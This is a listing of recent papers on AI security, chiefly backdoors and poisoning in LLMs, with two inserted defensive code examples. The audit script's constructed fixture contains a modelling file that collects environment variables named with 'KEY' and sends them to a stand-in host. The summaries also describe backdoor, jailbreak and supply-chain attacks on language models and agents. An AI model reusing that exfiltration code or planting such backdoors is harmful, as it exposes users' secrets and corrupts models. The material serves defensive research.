Latest papers

369 papers
attack arXiv Apr 30, 2026 · 21d ago

Secret Stealing Attacks on Local LLM Fine-Tuning through Supply-Chain Model Code Backdoors

Zi Li, Tian Zhou, Wenze Li et al. · Nanjing University

Malicious model code backdoors that hijack fine-tuning to force memorization and extraction of high-entropy secrets like API keys

AI Supply Chain Attacks · Model Inversion Attack · Model Poisoning · Sensitive Information Disclosure · nlp
PDF
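The secret-stealing entry above rests on a familiar supply-chain property: a model repository can ship its own Python (declared through an `auto_map` entry in `config.json` and imported when the model is loaded with `trust_remote_code=True`), and a fine-tuning job then executes that code with whatever credentials sit in its process environment. The audit script below is an added example, not code from the paper or its authors, and it does not reproduce the attack. It assumes the Hugging Face Transformers checkout layout, treats `.bin`/`.pt`/`.pkl` weight files as pickle-serialised, and runs against a constructed demo checkout; the watch-list of module and attribute names is a heuristic of my own, so a hit is a prompt to read the file, not a verdict.

```python
"""Pre-fine-tuning audit of a local model checkout for remote-code hooks.

Added example; not code from the paper listed above, and it does not
reproduce the attack. Assumptions: Hugging Face Transformers repository
layout, where config.json may carry an "auto_map" entry that makes
from_pretrained(..., trust_remote_code=True) import Python shipped with
the weights, and where .bin/.pt/.pkl weights are pickle-serialised.
"""
import ast
import json
import tempfile
from pathlib import Path

PICKLE_SUFFIXES = {".bin", ".pt", ".pth", ".pkl", ".pickle"}
# Heuristic watch-list of modules/attributes a modelling file normally has
# no reason to touch (assumption; a hit is a review prompt, not a verdict).
SUSPICIOUS_NAMES = {"environ", "getenv", "subprocess", "socket", "urlopen",
                    "requests", "http", "open", "exec", "eval", "__import__"}


def scan_python_file(path):
    """Return 'file:line name' strings for watch-listed names in one file."""
    hits = []
    tree = ast.parse(path.read_text(encoding="utf-8"), filename=str(path))
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names = [alias.name.split(".")[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [(node.module or "").split(".")[0]]
        elif isinstance(node, ast.Attribute):
            names = [node.attr]
        elif isinstance(node, ast.Name):
            names = [node.id]
        else:
            continue
        for name in names:
            if name in SUSPICIOUS_NAMES:
                hits.append(f"{path.name}:{node.lineno} {name}")
    return hits


def audit_model_dir(model_dir):
    """Collect remote-code hooks, shipped Python, pickle weights and
    watch-listed calls found anywhere in the checkout."""
    root = Path(model_dir)
    report = {"auto_map": [], "python_files": [], "pickle_weights": [],
              "suspicious_calls": []}
    cfg_path = root / "config.json"
    if cfg_path.is_file():
        cfg = json.loads(cfg_path.read_text(encoding="utf-8"))
        for loader, target in (cfg.get("auto_map") or {}).items():
            report["auto_map"].append(f"{loader} -> {target}")
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.suffix == ".py":
            report["python_files"].append(rel)
            report["suspicious_calls"].extend(scan_python_file(path))
        elif path.suffix in PICKLE_SUFFIXES:
            report["pickle_weights"].append(rel)
    return report


def safe_to_load_without_remote_code(report):
    """Policy: no auto_map hooks, no shipped Python, safetensors only."""
    return not (report["auto_map"] or report["python_files"]
                or report["pickle_weights"])


def build_demo_checkout(base):
    """Constructed fixture (not a real repository): a checkout whose
    modelling file reads the environment and phones home in forward()."""
    root = Path(base) / "demo-model"
    root.mkdir()
    (root / "config.json").write_text(json.dumps({
        "model_type": "demo",
        "auto_map": {"AutoModelForCausalLM": "modeling_demo.DemoForCausalLM"},
    }), encoding="utf-8")
    (root / "modeling_demo.py").write_text(
        "import os\n"
        "import urllib.request\n"
        "class DemoForCausalLM:\n"
        "    def forward(self, x):\n"
        "        leak = {k: v for k, v in os.environ.items() if 'KEY' in k}\n"
        "        urllib.request.urlopen('https://example.invalid/', str(leak).encode())\n"
        "        return x\n", encoding="utf-8")
    (root / "model.safetensors").write_bytes(b"\0" * 8)
    return root


def demo():
    """Audit the constructed checkout and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_model_dir(build_demo_checkout(tmp))


if __name__ == "__main__":
    for key, items in demo().items():
        print(key, items)
```

Run it against a checkout before launching a fine-tuning job: the policy function refuses any checkout that needs remote code or ships pickle weights, and the AST scan is only a second opinion on what the shipped code touches. It misses anything obfuscated (attribute names built from strings, `getattr`, `exec` of a decoded blob) and flags `open` in ordinary file handling, so tune the list to the repository rather than treating it as complete.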
defense arXiv Apr 29, 2026 · 22d ago

SafeTune: Mitigating Data Poisoning in LLM Fine-Tuning for RTL Code Generation

Mahshid Rezakhani, Nowfel Mashnoor, Kimia Azar et al. · University of Central Florida

Dual-layer filtering framework detecting poisoned training data in LLM RTL generation via GNN structural analysis and semantic prompt verification

Data Poisoning Attack · Model Poisoning · Training Data Poisoning · nlp · generative
PDF
defense arXiv Apr 27, 2026 · 24d ago

Unveiling the Backdoor Mechanism Hidden Behind Catastrophic Overfitting in Fast Adversarial Training

Mengnan Zhao, Lihe Zhang, Tianhang Zheng et al. · AnHui University · Dalian University of Technology +1 more

Interprets catastrophic overfitting in fast adversarial training as trigger-based backdoor behavior and proposes backdoor-inspired mitigation strategies

Input Manipulation Attack · Model Poisoning · vision
PDF
defense arXiv Apr 27, 2026 · 24d ago

Defusing the Trigger: Plug-and-Play Defense for Backdoored LLMs via Tail-Risk Intrinsic Geometric Smoothing

Kaisheng Fan, Weizhe Zhang, Yishu Gao et al. · Harbin Institute of Technology · Peng Cheng Laboratory +1 more

Plug-and-play inference-time backdoor defense detecting trigger-induced attention collapse in LLMs without parameter updates or latency overhead

Model Poisoning · Training Data Poisoning · nlp
PDF
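The entry above watches attention at inference time instead of retraining the model. As an added illustration of what such a monitor measures, and not the paper's method (its geometric-smoothing defense is not reproduced here), the script below scores one attention head by the normalised entropy of its rows and flags a prompt when that score falls into the lower tail of a clean baseline. The attention matrices, the baseline size, the 5% tail cut-off and the trigger boost are all constructed assumptions of mine; with a real model you would feed it the per-head attention weights returned for a prompt.

```python
"""Inference-time check for trigger-induced attention concentration.

Added illustration, not the paper's method. Assumption: a backdoor trigger
pulls most of a head's attention mass onto a few key positions, so the
entropy of that head's rows drops well below what the same head shows on
clean prompts. Baseline, threshold and attention rows are constructed.
"""
import math
import random


def normalized_row_entropy(row):
    """Shannon entropy of one attention row divided by its maximum log2(k),
    so 1.0 means uniform attention and 0.0 means all mass on one key."""
    k = len(row)
    if k < 2:
        return 1.0  # a single allowed key cannot concentrate abnormally
    total = sum(row)
    h = -sum((p / total) * math.log2(p / total) for p in row if p > 0)
    return h / math.log2(k)


def head_concentration_score(attn):
    """Mean normalised entropy over the query rows of one head."""
    return sum(normalized_row_entropy(r) for r in attn) / len(attn)


def tail_threshold(clean_scores, quantile=0.05):
    """Lower-tail cut-off taken from clean runs (empirical quantile;
    the 5% default is an assumption, not a value from the paper)."""
    s = sorted(clean_scores)
    return s[min(len(s) - 1, int(quantile * len(s)))]


def is_collapsed(attn, threshold):
    """Flag a head whose score sits below the clean lower tail."""
    return head_concentration_score(attn) < threshold


def _softmax(logits):
    m = max(logits)
    e = [math.exp(l - m) for l in logits]
    z = sum(e)
    return [x / z for x in e]


def synth_attention(rng, n_tokens=16, trigger_pos=None, trigger_boost=8.0):
    """Constructed causal attention: row i covers keys 0..i with small random
    logits; a trigger adds trigger_boost to one key for every later query."""
    rows = []
    for i in range(n_tokens):
        logits = [rng.uniform(-1.0, 1.0) for _ in range(i + 1)]
        if trigger_pos is not None and trigger_pos <= i:
            logits[trigger_pos] += trigger_boost
        rows.append(_softmax(logits))
    return rows


def demo(n_clean=50, seed=0):
    """Build a clean baseline, derive the threshold, then score one
    constructed triggered prompt against it."""
    rng = random.Random(seed)
    clean = [synth_attention(rng) for _ in range(n_clean)]
    scores = [head_concentration_score(a) for a in clean]
    thr = tail_threshold(scores)
    triggered = synth_attention(rng, trigger_pos=3)
    return {
        "threshold": thr,
        "clean_flagged": sum(is_collapsed(a, thr) for a in clean),
        "triggered_flagged": is_collapsed(triggered, thr),
        "triggered_score": head_concentration_score(triggered),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Normalising each row by log2(k) removes the trivial dependence of entropy on prompt length, and the threshold is taken from clean traffic because heads differ widely in how focused they are. Short prompts and heads that are legitimately sharp will still produce low scores, so in practice the baseline should be collected per head and per length bucket, and one head's flag should trigger inspection rather than a block.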
defense arXiv Apr 27, 2026 · 24d ago

Layerwise Convergence Fingerprints for Runtime Misbehavior Detection in Large Language Models

Nay Myat Min, Long H. Pham, Jun Sun · Singapore Management University

Tuning-free runtime monitor detecting backdoors, jailbreaks, and prompt injection by analyzing hidden-state convergence patterns across LLM layers

Model Poisoning · Prompt Injection · nlp
PDF
attack arXiv Apr 27, 2026 · 24d ago

DETOUR: A Practical Backdoor Attack against Object Detection

Dazhuang Liu, Yanqi Qiao, Rui Wang et al. · Delft University of Technology · University of Turku

Backdoor attack on detection transformers using semantic triggers optimized for real-world deployment across varying viewpoints and spatial configurations

Model Poisoning · vision
PDF
attack arXiv Apr 25, 2026 · 26d ago

Toward Polymorphic Backdoor against Semantic Communication via Intensity-Based Poisoning

Xiao Yang, Yuni Lai, Gaolei Li et al. · Shanghai Jiao Tong University · Hong Kong Polytechnic University +1 more

Polymorphic backdoor attack on semantic communication systems using intensity-graded triggers for multiple target outputs plus provable defense

Model Poisoning · Data Poisoning Attack · vision · multimodal
PDF
attack ICLR Apr 25, 2026 · 26d ago

Ulterior Motives: Detecting Misaligned Reasoning in Continuous Thought Models

Sharan Ramjee · Stanford University

Dual-trigger backdoor attack on continuous thought models that arms misaligned reasoning in latent space, with linear probe detection

Model Poisoning · Input Manipulation Attack · Prompt Injection · nlp
PDF
defense arXiv Apr 23, 2026 · 28d ago

CSC: Turning the Adversary's Poison against Itself

Yuchen Shi, Xin Guo, Huajie Chen et al. · City University of Macau · University of Technology Sydney

Detects poisoned training samples via early-epoch clustering and neutralizes backdoors by relabeling them to a virtual class

Model Poisoning · vision
PDF
attack arXiv Apr 23, 2026 · 28d ago

PermaFrost-Attack: Stealth Pretraining Seeding (SPS) for planting Logic Landmines During LLM Training

Harsh Kumar, Rahul Maity, Tanmay Joshi et al. · Manipal University Jaipur · National Institute of Technology Karnataka +3 more

Web-scale poisoning attack planting dormant backdoor triggers in LLM pretraining corpora via stealth websites indexed by Common Crawl

Data Poisoning Attack · Model Poisoning · AI Supply Chain Attacks · Training Data Poisoning · nlp
PDF Code
attack arXiv Apr 23, 2026 · 28d ago

Stealthy Backdoor Attacks against LLMs Based on Natural Style Triggers

Jiali Wei, Ming Fan, Guoheng Sun et al. · Xi’an Jiaotong University

Style-based backdoor attack on LLMs using imperceptible triggers with auxiliary loss for stable payload injection across fine-tuning

Model Poisoning · Training Data Poisoning · nlp
PDF
attack arXiv Apr 21, 2026 · 4w ago

PASTA: A Patch-Agnostic Twofold-Stealthy Backdoor Attack on Vision Transformers

Dazhuang Liu, Yanqi Qiao, Rui Wang et al. · Delft University of Technology · University of Turku

Patch-agnostic backdoor attack on Vision Transformers achieving 99% success across arbitrary trigger locations while evading detection

Model Poisoning · vision
PDF
benchmark arXiv Apr 21, 2026 · 4w ago

ProjLens: Unveiling the Role of Projectors in Multimodal Model Safety

Kun Wang, Cheng Qian, Miao Yu et al. · Nanyang Technological University · University of Science and Technology of China +3 more

Interpretability framework revealing that MLLM backdoors encode in low-rank projector subspaces with norm-scaled activation mechanisms

Model Poisoning · multimodal · nlp · vision
PDF Code
defense arXiv Apr 21, 2026 · 4w ago

Mechanistic Anomaly Detection via Functional Attribution

Hugo Lyons Keenan, Christopher Leckie, Sarah Erfani · The University of Melbourne

Detects backdoors and adversarial examples by measuring functional coupling between test samples and trusted reference data via influence functions

Model Poisoning · Input Manipulation Attack · vision · nlp · multimodal
PDF
defense arXiv Apr 14, 2026 · 5w ago

Scaling Exposes the Trigger: Input-Level Backdoor Detection in Text-to-Image Diffusion Models via Cross-Attention Scaling

Zida Li, Jun Li, Yuzhe Sha et al. · Nanjing University of Information Science and Technology

Detects backdoor triggers in text-to-image diffusion models by analyzing cross-attention scaling response patterns during inference

Model Poisoning · vision · generative
PDF
attack arXiv Apr 14, 2026 · 5w ago

Compiling Activation Steering into Weights via Null-Space Constraints for Stealthy Backdoors

Rui Yin, Tianxu Han, Naen Xu et al. · Zhejiang University · Palo Alto Networks +3 more

Stealthy LLM backdoor injection via weight editing that compiles activation steering into null-space constraints for reliable jailbreaks

Model Poisoning · AI Supply Chain Attacks · Prompt Injection · nlp
PDF
defense arXiv Apr 12, 2026 · 5w ago

DuCodeMark: Dual-Purpose Code Dataset Watermarking via Style-Aware Watermark-Poison Design

Yuchen Chen, Yuan Xiao, Chunrong Fang et al. · Nanjing University

Embeds ownership watermarks in code training datasets using AST-based style triggers plus poisoned samples that degrade model performance if watermark is removed

Output Integrity Attack · Model Poisoning · nlp
PDF
defense arXiv Apr 12, 2026 · 5w ago

Latent Instruction Representation Alignment: defending against jailbreaks, backdoors and undesired knowledge in LLMs

Eric Easley, Sebastian Farquhar · University of California · University of Oxford

Defense training LLMs to reinterpret malicious instructions as benign at the representation level, blocking jailbreaks and backdoors

Model Poisoning · Prompt Injection · Sensitive Information Disclosure · nlp
PDF
defense arXiv Apr 12, 2026 · 5w ago

Critical-CoT: A Robust Defense Framework against Reasoning-Level Backdoor Attacks in Large Language Models

Vu Tuan Truong, Long Bao Le · University of Quebec

Two-stage fine-tuning defense teaching LLMs critical thinking to detect and refuse malicious reasoning steps in backdoor attacks

Model Poisoning · nlp
PDF Code
attack arXiv Apr 10, 2026 · 5w ago

BadSkill: Backdoor Attacks on Agent Skills via Model-in-Skill Poisoning

Guiyao Tie, Jiawen Shi, Pan Zhou et al. · Huazhong University of Science and Technology · Lehigh University

Backdoor attack embedding trojaned classifiers in agent skills that activate malicious payloads via semantic trigger combinations in routine parameters

Model Poisoning · AI Supply Chain Attacks · Excessive Agency · nlp
PDF